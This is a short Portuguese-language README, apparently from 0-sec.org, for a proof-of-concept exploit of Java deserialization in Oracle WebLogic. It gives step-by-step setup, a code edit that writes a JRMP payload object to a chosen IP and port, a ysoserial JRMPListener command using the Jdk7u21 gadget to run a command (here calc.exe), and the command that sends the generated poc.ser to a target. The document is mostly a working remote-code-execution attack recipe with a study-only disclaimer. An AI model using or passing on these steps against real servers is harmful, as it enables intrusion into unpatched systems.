
0-sec.org
Apenas para fins de estudo e compartilhamento técnico; outras utilizações são de inteira responsabilidade do usuário.
Os arquivos jar relevantes já foram importados para o projeto, e o método de exploração utiliza o JRMP do yso. Ao estudar ou depurar, você pode modificar o método de exploração.
Primeiro, coloque o arquivo SerializedSystemIni.dat do weblogic na pasta security.
Em seguida, renomeie o yso para ysoserial.jar e importe-o para o diretório lib.

Depois, ajuste o endereço IP e a porta do getObject em weblogic/wsee/jaxws/persistence/PersistentContext.java.
try {
var3.writeObject(Poc.getObject("127.0.0.1:8000"));
} catch (Exception e) {
e.printStackTrace();
}
Por fim, faça a escuta remotamente via JRMP e utilize a execução de comandos do 7u21.
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"
Método de uso: execute o Poc.java para gerar o arquivo de serialização poc.ser e, em seguida, use:
python weblogic.py ip port poc.ser

